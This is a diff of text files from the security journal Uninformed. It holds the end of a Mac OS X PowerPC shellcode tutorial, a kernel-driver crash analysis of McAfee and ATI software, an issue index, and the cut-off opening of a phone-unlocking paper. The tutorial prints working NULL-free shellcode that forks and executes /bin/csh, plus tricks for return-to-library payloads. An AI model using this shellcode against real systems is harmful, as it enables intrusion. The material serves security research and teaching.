;; Demonstrate index register usage
;;
main:
li r7, 1999 ; place a NULL-free value into the index
subi r5, r7, 1999-1 ; substract our value minus the target
; the r5 register is now set to 1
If you have a rough idea of the immediate values you will need in your
shellcode, you can take this a step further. Set your initial index register to
a value, that when decremented by the immediate value, actually results in a
character of your choice. If you have two distant ranges (1-10 and 50-60), then
consider using two index registers. The example below demonstrates an index
register that works for the system call number as well as the arguments,
leaving the assembled bytes NULL-free. As you can see, besides the four bytes
required to set the index register, this method does not significantly increase
the size of the code.
;;
;; Create a TCP socket without NULL bytes
;;
main:
li r7, 0x3330 ; 0x38e03330 = NULL-free index value
subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket
subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain
subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type
subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol
.long 0x45585037 ; patched 'sc' instruction
3.3) Branching
Branching to a forward address without using NULL bytes can be tricky on
PowerPC systems. If you try branching forward, but less than 256 bytes, your
opcode will contain a NULL. If you obtain your current address and want to
branch to an offset from it, you will need to place the target address into the
count register (ctr) or the link register (lr). If you decide to use the link
register, you will notice that every valid form of "blr" has a NULL byte. You
can avoid the NULL byte by setting the branch hint bits (19-20) to "11"
(unpredictable branch, do not optimize). The resulting opcode becomes
0x4e804820 instead of 0x4e800020 for the standard "blr" instruction.
The branch prediction bit (bit 10) can also come in handy, it is useful if you
need to change the second byte of the branch instruction to a different
character. The prediction bit tells the processor how likely it is that the
instruction will result in a branch. To specify the branch prediction bit in
the assembly source, just place '-' or '+' after the branch instruction.
4) Mac OS X Tricks
This section describes a handful of tips and tricks for writing shellcode on
the Mac OS X platform.
4.1) Diagnostic Tools
Mac OS X includes a solid collection of development and diagnostic tools, many
of which are invaluable for shellcode and exploit development. The list below
describes some of the most commonly used tools and how they relate to shellcode
development.
Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not
included and most disassembly needs to be done with 'gdb' or 'otool'.
ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss
on Solaris. There is no better tool for quickly diagnosing shellcode
bugs.
vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it.
Use vmmap to figure out where the heap, library, and stacks are mapped.
crashreporterd: This daemon runs by default and creates very nice crash dumps
when a system service dies. Invaluable for finding 0-day in Mac OS X
services. The crashdump logs can be found in /Library/Logs/CrashReporter.
heap: Quickly list all heaps in a process. This can be handy when the
instruction cache prevents a direct return and you need to find an
alternate shellcode location.
otool: List all libraries linked to a given binary, disassemble mach-o
binaries, and display the contents of any section of an executable or
library. This is the equivalent of 'ldd' and 'objdump' rolled into a
single utility
4.2) System Call Failure
An interesting feature of Mac OS X is that a successful system call will return
to the address 4 bytes after the end of 'sc' instruction and a failed system
call will return directly after the 'sc' instruction. This allows you to
execute a specific instruction only when the system call fails. The most common
application of this feature is to branch to an error handler, although it can
also be used to set a flag or a return value. When writing shellcode, this
feature is usually more annoying than anything else, since it boosts the size
of your code by four bytes per system call. In some cases though, this feature
can be used to shave an instruction or two off the final payload.
4.3) Threads and Execve
Mac OS X has an undocumented behavior concerning the execve() system call
inside a threaded process. If a process tries to call execve() and has more
than one active thread, the kernel returns the error EOPNOTSUPP. After a closer
look at kernexec.c in the Darwin XNU source code, it becomes apparent that for
shellcode to function properly inside a threaded process, it will need to call
either fork() or vfork() before calling execve().
;;
;; Fork and execute a command shell
;;
main:
_fork:
li r0, 2
sc
b _exitproc
_execsh: ; based on ghandi's execve
xor. r5, r5, r5
bnel _execsh
mflr r3
addi r3, r3, 32 ; 32
stw r3, -8(r1) ; argv[0] = path
stw r5, -4(r1) ; argv[1] = NULL
subi r4, r1, 8 ; r4 = {path, 0}
li r0, 59
sc ; execve(path, argv, NULL)
b _exitproc
_path:
.ascii "/bin/csh" ; csh handles seteuid() for us
.long 0
_exitproc:
li r0, 1
li r3, 0
sc
4.4) Shared Libraries
The Mac OS X user community tends to have one thing in common -- they keep
their systems up to date. The Apple Software Update service, once enabled, is
very insistent about installing new software releases as they become available.
The result is that nearly every single Mac OS X system has the exact same
binaries. System libraries are often loaded at the exact same virtual address
across all applications. In this sense, Mac OS X is starting to resemble the
Windows platform.
If all processes on all Mac OS X system have the same virtual addresses for the
same libraries, Windows-style shellcode starts to become possible. Assuming you
can find the right argument-setting code in a shared library, return-to-library
payloads also become much more feasible. These libraries can be used as return
addresses, similar to how Windows exploits often return back to a loaded DLL.
Some useful addresses are listed below:
0x90000000: The base address of the system library (libSystem.B.dylib), most
of the function locations are static across all versions of OS X.
0xffff8000: The base address of the "common" page. A number of useful
functions and instructions can be found here. These functions
include memcpy, sysdcacheflush, sysicacheinvalidate, and bcopy.
The following NULL-free example uses the sysicacheinvalidate function to flush
1040 bytes from the instruction cache, starting at the address of the payload:
;;
;; Flush the instruction cache in 32 bytes
;;
main:
_main:
xor. r5, r5, r5
bnel main
mflr r3
;; flush 1040 bytes starting after the branch
li r4, 1024+16
;; 0xffff8520 is __sys_icache_invalidate()
addis r8, r5, hi16(0xffff8520)
ori r8, r8, lo16(0xffff8520)
mtctr r8
bctrl
5) Conclusion
In the first section, we covered the fundamentals of the PowerPC platform and
described the syscall calling convention used on the Darwin/Mac OS X platform.
The second section introduced a few techniques for removing NULL bytes from
some common instructions. In the third section, we presented some of the tools
and techniques that can be useful for shellcode development.
Bibliography
B-r00t PowerPC / OSX (Darwin) Shellcode Assembly.
http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf
Bunda, Potter, Shadowen Powerpc Microprocessor Developer\'s Guide.
http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/
Steve Heath Newnes Power PC Programming Pocket Book.
http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/
IBM PowerPC Assembler Language Reference.
http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm

567
uninformed/1.7.txt Normal file
View File

@ -0,0 +1,567 @@
What Were They Thinking?
Annoyances Caused by Unsafe Assumptions
skape
mmiller@hick.org
Last modified: 04/04/2005
1) Introduction
There is perhaps no issue more dear to a developer's heart than the
issue of interoperability with third-party applications. In some
cases, software that is being written by one developer has to be
altered in order to make it function properly when used in
conjunction with another application that is created by a
third-party. For the sake of illustration, the lone developer will
henceforth be referred to as the protagonist given his or her
valiant efforts in their quest to obtain that which is almost always
unattainable: interoperability. The third-parties, on the other
hand, will be referred to as the antagonists due to their wretched
attempts to prevent the protagonist from obtaining his or her goal
of a utopian software environment. Now, granted, that's not to say
that the protagonist can't also become the antagonist by continuing
the ugly cycle of exposing compatibility issues to other would-be
protagonists, but for the sake of discussion such a point is not
relevant.
What is relevant, however, are the ways in which an antagonistic
developer can write software that will force other developers to
work around issues exposed by the software that the antagonist has
written. There are far too many specific issues to list, but the
majority of these issues can be generalized into one category that
will serve as the focus for this document. To put it simply, many
developers make assumptions about the state of the machine that
their software will be executing on. For instance, some software
will assume that they are the only piece of software performing a
given task on a machine. In the event that another piece of software
attempts to perform a similar task, such as may occur when two
applications need to extend APIs by hooking them, the results may be
unpredictable. Perhaps a more concrete example of where assumptions
can lead to problems can be seen when developers assume that the
behavior of undocumented or unexposed APIs will not change.
Before putting all of the blame on the antagonists, however, it is
important to understand that it is, in most cases, necessary to make
assumptions about the way in which undocumented code performs, such
as when dealing with low-level software. This is especially true
when dealing with closed-source APIs, such as those provided by
Microsoft. To that point, Microsoft has made an effort to document
the ways in which every exposed API routine can perform, thereby
reducing the number of compatibility issues that a developer might
experience if they were to assume that a given routine would always
perform in the same manner. Furthermore, Microsoft is renowned for
attempting to always provide backwards compatibility. If a
Microsoft application performs one way in a given release, chances
are that it will continue to perform in the same fashion in
subsequent releases. Third-party vendors, on the other hand, tend to
have a more egocentric view of the way in which their software
should work. This leads most vendors to dodge responsibility by
pointing the blame at the application that is attempting to perform
a certain task rather than making their code to be more robust.
In the interest of helping to make code more robust, this document
will provide two examples of widely used software that make
assumptions about the way in which code will execute on a given
machine. The assumptions these applications make are always safe
under normal conditions. However, if a new application that
performs a certain task or an undocumented change is thrown into the
mix, the applications find themselves faltering in the most
unenjoyable ways. The two applications that will be analyzed are
listed below:
- McAfee VirusScan Consumer (8.0/9.0)
- ATI Radeon 9000 Driver Series
Each of the assumptions that these two software products make will
be analyzed in-depth to describe why it is that they are poor
assumptions to make, such as by describing or illustrating
conditions where the assumptions are, or could be, false. From
there, suggestions will be made on how these assumptions might be
worked around or fixed to allow for a more stable product in
general. In the end, the reader should have a clear understanding of
the assumptions described in this document. If successful, the
author hopes the topic will allow the reader to think critically
about the various assumptions the reader might make when
implementing software.
2) McAfee VirusScan Consumer (8.0/9.0)
2.1) The Assumption
McAfee VirusScan Consumer 8.0, 9.0, and possibly previous versions
make assumptions about processes not performing certain types of
file operations during a critical phase of process initialization.
If file operations are performed during this phase, the machine may
blue screen due to an invalid pointer access.
2.2) The Problem
The critical phase of process execution that the summary refers to is the
period between the time that the new process object instance is created by
nt!ObCreateObject and the time the new process object is inserted into the
process object type list by nt!ObInsertObject. The reason this phase is so
critical is because it is not safe for things to attempt to obtain a handle to
the process object, such as can be done by calling nt!ObOpenObjectByPointer.
If an application were to attempt to obtain a handle to the process object
before it had been inserted into the process object list by nt!ObInsertObject,
critical creation state information that is stored in the process object's
header would be overwritten with state information that is meant to be used
after the process has passed the initial security validation phase that is
handled by nt!ObInsertObject. In some cases, overwriting the creation state
information prior to calling nt!ObInsertObject can lead to invalid pointer
references when nt!ObInsertObject is eventually called, thus leading to an evil
blue screen that some users are all too familiar with.
To better understand this problem it is first necessary to understand the way
in which nt!PspCreateProcess creates and initializes the process object and the
process handle that is passed back to callers. The object creation portion is
accomplished by making a call to nt!ObCreateObject in the following fashion:
ObCreateObject(
KeGetPreviousMode(),
PsProcessType,
ObjectAttributes,
KeGetPreviousMode(),
0,
0x258,
0,
0,
&ProcessObject);
If the call is successful, a process object of the supplied size is created and
initialized using the attributes supplied by the caller. In this case, the
object is created using the nt!PsProcessType object type. The size argument
that is supplied to nt!ObCreateObject, which in this case is 0x258, will vary
between various versions of Windows as new fields are added and removed from
the opaque EPROCESS structure. The process object's instance, as with all
objects, is prefixed with an OBJECT_HEADER that may or may not also be prefixed
with optional object information. For reference, the OBJECT_HEADER structure is
defined as follows:
OBJECT_HEADER:
+0x000 PointerCount : Int4B
+0x004 HandleCount : Int4B
+0x004 NextToFree : Ptr32 Void
+0x008 Type : Ptr32 _OBJECT_TYPE
+0x00c NameInfoOffset : UChar
+0x00d HandleInfoOffset : UChar
+0x00e QuotaInfoOffset : UChar
+0x00f Flags : UChar
+0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : Ptr32 Void
+0x014 SecurityDescriptor : Ptr32 Void
+0x018 Body : _QUAD
When an object is first returned from nt!ObCreateObject, the Flags attribute
will indicate if the ObjectCreateInfo attribute is pointing to valid data by
having the OB_FLAG_CREATE_INFO, or 0x1 bit, set. If the flag is set then the
ObjectCreateInfo attribute will point to an OBJECT_CREATE_INFORMATION structure
which has the following definition:
OBJECT_CREATE_INFORMATION:
+0x000 Attributes : Uint4B
+0x004 RootDirectory : Ptr32 Void
+0x008 ParseContext : Ptr32 Void
+0x00c ProbeMode : Char
+0x010 PagedPoolCharge : Uint4B
+0x014 NonPagedPoolCharge : Uint4B
+0x018 SecurityDescriptorCharge : Uint4B
+0x01c SecurityDescriptor : Ptr32 Void
+0x020 SecurityQos : Ptr32 _SECURITY_QUALITY_OF_SERVICE
+0x024 SecurityQualityOfService : _SECURITY_QUALITY_OF_SERVICE
When nt!ObInsertObject is finally called, it is assumed that the object still
has the OB_FLAG_CREATE_INFO bit set. This will always be the case unless something
has caused the bit to be cleared, as will be illustrated later in this chapter.
The flow of execution within nt!ObInsertObject begins first by checking to see
if the process' object header has any name information, which is conveyed by
the NameInfoOffset of the OBJECT_HEADER. Regardless of whether or not the
object has name information, the next step taken is to check to see if the
object type that is associated with the object that is supplied to
nt!ObInsertObject requires a security check to be performed. This requirement
is conveyed through the TypeInfo attribute of the OBJECT_TYPE structure which is
defined below:
OBJECT_TYPE:
+0x000 Mutex : _ERESOURCE
+0x038 TypeList : _LIST_ENTRY
+0x040 Name : _UNICODE_STRING
+0x048 DefaultObject : Ptr32 Void
+0x04c Index : Uint4B
+0x050 TotalNumberOfObjects : Uint4B
+0x054 TotalNumberOfHandles : Uint4B
+0x058 HighWaterNumberOfObjects : Uint4B
+0x05c HighWaterNumberOfHandles : Uint4B
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
+0x0ac Key : Uint4B
+0x0b0 ObjectLocks : [4] _ERESOURCE
OBJECT_TYPE_INITIALIZER:
+0x000 Length : Uint2B
+0x002 UseDefaultObject : UChar
+0x003 CaseInsensitive : UChar
+0x004 InvalidAttributes : Uint4B
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : Uint4B
+0x01c SecurityRequired : UChar
+0x01d MaintainHandleCount : UChar
+0x01e MaintainTypeList : UChar
+0x020 PoolType : _POOL_TYPE
+0x024 DefaultPagedPoolCharge : Uint4B
+0x028 DefaultNonPagedPoolCharge : Uint4B
+0x02c DumpProcedure : Ptr32
+0x030 OpenProcedure : Ptr32
+0x034 CloseProcedure : Ptr32
+0x038 DeleteProcedure : Ptr32
+0x03c ParseProcedure : Ptr32
+0x040 SecurityProcedure : Ptr32
+0x044 QueryNameProcedure : Ptr32
+0x048 OkayToCloseProcedure : Ptr32
The specific boolean field that is checked by nt!ObInsertObject is the
TypeInfo.SecurityRequired flag. If the flag is set to TRUE, which it is for
the nt!PsProcessType object type, then nt!ObInsertObject uses the access state
that is passed in as the second argument or creates a temporary access state
that it uses to validate the access mask that is supplied as the third argument
to nt!ObInsertObject. Prior to validating the access state, however, the
SecurityDescriptor attribute of the ACCESS_STATE structure is set to the
SecurityDescriptor of the OBJECT_CREATE_INFORMATION structure. This is done
without any checks to ensure that the OB_FLAG_CREATE_INFO flag is still set in the
object's header, thus making it potentially dangerous if the flag has been
cleared and the union'd attribute no longer points to creation information.
In order to validate the access mask, nt!ObInsertObject calls into
nt!ObpValidateAccessMask with the initialized ACCESS_STATE as the only argument.
This function first checks to see if the ACCESS_STATE's SecurityDescriptor
attribute is set to NULL. If it's not, then the function checks to see if the
SecurityDescriptor's Control attribute has a flag set. It is at this point
that the problem is realized under conditions where the object's
ObjectCreateInfo attribute no longer points to creation information. When such
a condition occurs, the SecurityDescriptor attribute that is referenced
relative to the ObjectCreateInfo attribute will potentially point to invalid
memory. This can then lead to an access violation when attempting to reference
the SecurityDescriptor that is passed as part of the ACCESS_STATE instance to
nt!ObpValidateAccessMask. For reference, the ACCESS_STATE structure is defined
below:
ACCESS_STATE:
+0x000 OperationID : _LUID
+0x008 SecurityEvaluated : UChar
+0x009 GenerateAudit : UChar
+0x00a GenerateOnClose : UChar
+0x00b PrivilegesAllocated : UChar
+0x00c Flags : Uint4B
+0x010 RemainingDesiredAccess : Uint4B
+0x014 PreviouslyGrantedAccess : Uint4B
+0x018 OriginalDesiredAccess : Uint4B
+0x01c SubjectSecurityContext : _SECURITY_SUBJECT_CONTEXT
+0x02c SecurityDescriptor : Ptr32 Void
+0x030 AuxData : Ptr32 Void
+0x034 Privileges : __unnamed
+0x060 AuditPrivileges : UChar
+0x064 ObjectName : _UNICODE_STRING
+0x06c ObjectTypeName : _UNICODE_STRING
Under normal conditions, nt!ObInsertObject is the first routine to create a
handle to the newly created object instance. When the handle is created, the
creation information that was initialized during the instantiation of the
object is used for such things as validating access, as described above. Once
the creation information is used it is discarded and replaced with other
information that is specific to the type of the object being inserted. In the
case of process objects, the Flags attribute has the OB_FLAG_CREATE_INFO bit
cleared and the QuotaBlockCharged attribute, which is union'd with the
ObjectCreateInfo attribute, is set to an instance of an EPROCESS_QUOTA_BLOCK
which is defined below:
EPROCESS_QUOTA_ENTRY:
+0x000 Usage : Uint4B
+0x004 Limit : Uint4B
+0x008 Peak : Uint4B
+0x00c Return : Uint4B
EPROCESS_QUOTA_BLOCK:
+0x000 QuotaEntry : [3] _EPROCESS_QUOTA_ENTRY
+0x030 QuotaList : _LIST_ENTRY
+0x038 ReferenceCount : Uint4B
+0x03c ProcessCount : Uint4B
The assumptions made by nt!ObInsertObject work flawlessly so long as it is the
first routine to create a handle to the object instance. Fortunately, under
normal circumstances, nt!ObInsertObject is always the first routine to create a
handle to the object. Unfortunately for McAfee, however, they assume that they
can safely attempt to obtain a handle to a process object without first
checking to see what state of execution the process is in, such as by checking
to see if the OB_FLAG_CREATE_INFO flag is set in the object's header. By
attempting to obtain a handle to the process object before it is inserted by
nt!ObInsertObject, McAfee effectively destroys state that is needed by
nt!ObInsertObject to succeed.
To show this problem being experienced in the real world, the following
debugger output shows McAfee first attempting to obtain a handle to the process
object which is then followed shortly thereafter by nt!ObInsertObject
attempting to validate the object's access mask with a bogus SecurityDescriptor
which, in turn, results in an unrecoverable access violation:
McAfee attempting to open a handle to the process object before
nt!ObInsertObject has been called:
kd> k
nt!ObpChargeQuotaForObject+0x2f
nt!ObpIncrementHandleCount+0x70
nt!ObpCreateHandle+0x17c
nt!ObOpenObjectByPointer+0x97
WARNING: Stack unwind information not available.
NaiFiltr+0x2e45
NaiFiltr+0x3bb2
NaiFiltr+0x4217
nt!ObpLookupObjectName+0x56a
nt!ObOpenObjectByName+0xe9
nt!IopCreateFile+0x407
nt!IoCreateFile+0x36
nt!NtOpenFile+0x25
nt!KiSystemService+0xc4
nt!ZwOpenFile+0x11
0x80a367b5
nt!PspCreateProcess+0x326
nt!NtCreateProcessEx+0x7e
nt!KiSystemService+0xc4
After which point nt!ObInsertObject attempts to validate the
object's access mask using an invalid SecurityDescriptor:
kd> k
nt!ObpValidateAccessMask+0xb
nt!ObInsertObject+0x1c2
nt!PspCreateProcess+0x5dc
nt!NtCreateProcessEx+0x7e
nt!KiSystemService+0xc4
kd> r
eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994
edx=00000000 esi=00000000 edi=ffb83f00
eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8
iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023
fs=0030 gs=0000 efl=00000202
nt!ObpValidateAccessMask+0xb:
8057828e f6410210
test byte ptr [ecx+0x2],0x10 ds:0023:00023996=??
The method by which this issue was located was by setting a breakpoint on the
instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once
hit, a memory access breakpoint was set on the Flags attribute of the object's
header that would break whenever the field was written to. This, in turn, lead
to the tracking down of the fact that McAfee was acquiring a handle to the
process object prior to nt!ObInsertObject being called, which in turn lead to
the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute
being invalidated.
2.3) The Solution
There are two ways that have been identified that could correct this issue.
The first, and most plausible, would be for McAfee to modify their driver such
that it will refuse to acquire a handle to a process object if the
OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The
downside to using this approach is that it requires McAfee to make use of
undocumented structures that are intended by Microsoft to be opaque, and for
good reason. However, the author is not currently aware of another means by
which an object's creation state can be detected using general purpose API
routines.
The second approach, and it's one that should at least result in a bugcheck
within nt!ObInsertObject, would be to check to see if the object's
OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be
taken to validate the object's access mask. If it hasn't, the current method
of validating the access mask can be used. At this point in time, the author
cannot currently speak on what the alternate action would be, though it seems
plausible that there would be another means by which a synonymous action could
be performed without relying on the creation information in the object header.
In the event that neither of these solutions are pursued, it will continue to
be necessary for protagonistic developers to avoid performing actions between
nt!ObCreateObject and nt!ObInsertObject that might result in file operations
being performed from within the new process' context. One of a number of
work-arounds to this problem would be to post file operations off to a system
worker thread that would then inherently run within the context of the System
process rather than the new process.
3) ATI Radeon 9000 Driver Series
3.1) The Assumption
The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes
assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will
be mapped at in the address space of a process that attempts to do 3D
operations. If the structure is not mapped at the address that is expected,
the machine may blue screen depending on the values that exist at the memory
location, if any.
3.2) The Problem
During some experimentation with changing the default address space layout of
processes on NT-based versions of Windows, it was noticed that machines that
were using the ATI Radeon 9000 series drivers would crash if a process
attempted to do 3D operations and the location of the process' parameter
information was changed from the address at which it is normally mapped at.
Before proceeding, it is first necessary for the reader to understand the
purpose of the process parameter information structure and how it is that it's
mapped into the process' address space.
Most programmers are familiar with the API routine kernel32!CreateProcess[A/W].
This routine serves as the primary means by which user-mode applications spawn
new processes. The function itself is robust enough to support a number of
ways in which a new process can be initialized and then executed. Behind the
scenes, CreateProcess performs all of the necessary operations to prepare the
new task for execution. These options include opening the executable image
file and creating a section object that is then passed to
ntdll!NtCreateProcessEx which returns a unique process handle on success. If a
handle is obtained, CreateProcess then proceeds to prepare the process for
execution by initializing the process' parameters as well as creating and
initializing the first thread in the process. A more complete analysis of the
way in which CreateProcess operates can be found in David Probert's excellent
analysis of Windows NT's process architecture.
For the purpose of this document, however, the part that is of most concern is
that step in which CreateProcess initializes the new process' parameters. This
is accomplished by making a call into kernel32!BasePushProcessParameters which
in turn calls into ntdll!RtlCreateProcessParameters. The parameters are
initialized within the process that is calling CreateProcess and are then, in
turn, copied into the address space of the new process by first allocating
storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from
the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the
fact that this occurs before the new process actually executes any code, the
address that the process parameter structure is allocated at is almost
guaranteed to be at the same address. This address happens to be 0x00020000.
This fact is most likely why ATI made the assumption that the process parameter
information would always be at a static address.
If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter
storage at any place other than the static address described above, ATI's
driver will attempt to reference a potentially invalid address when it comes
time to perform 3D operations. The specific portion of the driver suite that
has the error is the ATI3DUAG.DLL kernel-mode graphics driver. Inside this
image there is a portion of code that attempts to make reference to the
addresses 0x00020038 and 0x0002003C without doing any sort of probing and
locking or validation on the region it's requesting. If the region does not
exist or contains unexpected data, a blue screen is a sure thing. The actual
portion of the driver that makes this assumption can be found below:
mov [ebp+var_4], eax
mov edx, 20000h <--
mov [ebp+var_24], edx
movzx ecx, word ptr ds:dword_20035+3 <--
shr ecx, 1
mov [ebp+var_28], ecx
lea eax, [ecx-1]
mov [ebp+var_1C], eax
test eax, eax
jbe short loc_227CC
mov ebx, [edx+3Ch] <--
cmp word ptr [ebx+eax*2], '\'
The lines of intereste are marked by ``<--'' indicators pointing to the exact
instructions that result in a reference being made to an address that is
expected to be within a process' parameter information structure. For the sake
of investigation, one might wonder what it is that the driver could be
attempting to reference. To determine that, it is first necessary to dump the
format of the process parameter structure which, as stated previously, is
RTL_USER_PROCESS_PARAMETERS:
RTL_USER_PROCESS_PARAMETERS:
+0x000 MaximumLength : Uint4B
+0x004 Length : Uint4B
+0x008 Flags : Uint4B
+0x00c DebugFlags : Uint4B
+0x010 ConsoleHandle : Ptr32 Void
+0x014 ConsoleFlags : Uint4B
+0x018 StandardInput : Ptr32 Void
+0x01c StandardOutput : Ptr32 Void
+0x020 StandardError : Ptr32 Void
+0x024 CurrentDirectory : _CURDIR
+0x030 DllPath : _UNICODE_STRING
+0x038 ImagePathName : _UNICODE_STRING
+0x040 CommandLine : _UNICODE_STRING
+0x048 Environment : Ptr32 Void
+0x04c StartingX : Uint4B
+0x050 StartingY : Uint4B
+0x054 CountX : Uint4B
+0x058 CountY : Uint4B
+0x05c CountCharsX : Uint4B
+0x060 CountCharsY : Uint4B
+0x064 FillAttribute : Uint4B
+0x068 WindowFlags : Uint4B
+0x06c ShowWindowFlags : Uint4B
+0x070 WindowTitle : _UNICODE_STRING
+0x078 DesktopInfo : _UNICODE_STRING
+0x080 ShellInfo : _UNICODE_STRING
+0x088 RuntimeData : _UNICODE_STRING
+0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
To determine the attribute that the driver is attempting to reference, one must
take the addresses and subtract them from the base address 0x00020000. This
produces two offsets: 0x38 and 0x3c. Both of these offsets are within the
ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure
is defined as:
UNICODE_STRING:
+0x000 Length : Uint2B
+0x002 MaximumLength : Uint2B
+0x004 Buffer : Ptr32 Uint2B
This would mean that the driver is attempting to reference the path name of the
process' executable image. The 0x38 offset is the length of the image path
name and the 0x3c is the pointer to the image path name buffer that actually
contains the path. The reason that the driver would need to get access to the
executable path is outside of the scope of this discussion, but suffice to say
that the method on which it is based is an assumption that may not always be
safe to make, especially under conditions where the process' parameter
information is not mapped at 0x00020000.
3.3) The Solution
The solution to this problem would be for ATI to come up with an alternate
means by which the process' image path name can be obtained. Possibilities for
alternate methods include referencing the PEB to obtain the address of the
process parameters (by using the ProcessParameters attribute of the PEB). This
approach is suboptimal because it requires that ATI attempt to reference fields
in a structure that is intended to be opaque and also readily changes between
versions of Windows. Another alternate approach, which is perhaps the most
feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS.
This information class can be queried using the NtQueryInformationProcess
system call to populate a UNICODE_STRING that contains the full path to the
image that is associated with the handle that is supplied to
NtQueryInformationProcess. The nice thing about this is that it actually
indirectly uses the alternate method from the first proposal, but it does so
internally rather than forcing an external vendor to access fields of the PEB.
Regardless of the actual solution, it seems obvious that assuming that a region
of memory will be mapped at a fixed address in every process is something that
ATI should not do. There are indeed cases where Windows itself requires
certain things to be mapped at the same address between one execution of a
process to the next, but it is the opinion of the author that ATI should not
assume things that Windows itself does not also assume.
4) Conclusion
Though this document may appear as an attempt to make specific 3rd party
vendors look bad, that is not its intention. In fact, the author acknowledges
having been an antagonistic developer in the past. To that point, the author
hopes that by providing specific illustrations of where assumptions made by 3rd
parties can lead to problems, the reader will be more apt to consider potential
conditions that might become problematic if other applications attempt to
co-exist with ones that the reader may write in the future.
Bibliography
Probert, David B. Windows Kernel Internals: Process Architecture.
http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt;
accessed April 04, 2005.

43
uninformed/1.txt Normal file
View File

@ -0,0 +1,43 @@
Engineering in Reverse
Introduction to Reverse Engineering Win32 Applications
trew
During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid.
code.tgz | pdf | html | txt
Exploitation Technology
Post-Exploitation on Windows using ActiveX Controls
skape
When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
pdf | html | txt
General Research
Smart Parking Meters
h1kari
Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
html | txt
General Security
Loop Detection
Peter Silberman
During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins.
code.tgz | pdf | html | txt
Social Zombies: Aspects of Trojan Networks
warlord
Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography.
pdf | html | txt
Machine Speak
Mac OS X PPC Shellcode Tricks
H D Moore
Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode.
pdf | html | txt
What Were They Thinking?
Annoyances Caused by Unsafe Assumptions
skape
This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems.
pdf | html | txt

929
uninformed/10.1.txt Normal file
View File

@ -0,0 +1,929 @@
Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
10/2008
Skywing
skywing_uninformed@valhallalegends.com
0. Abstract
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800
(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number
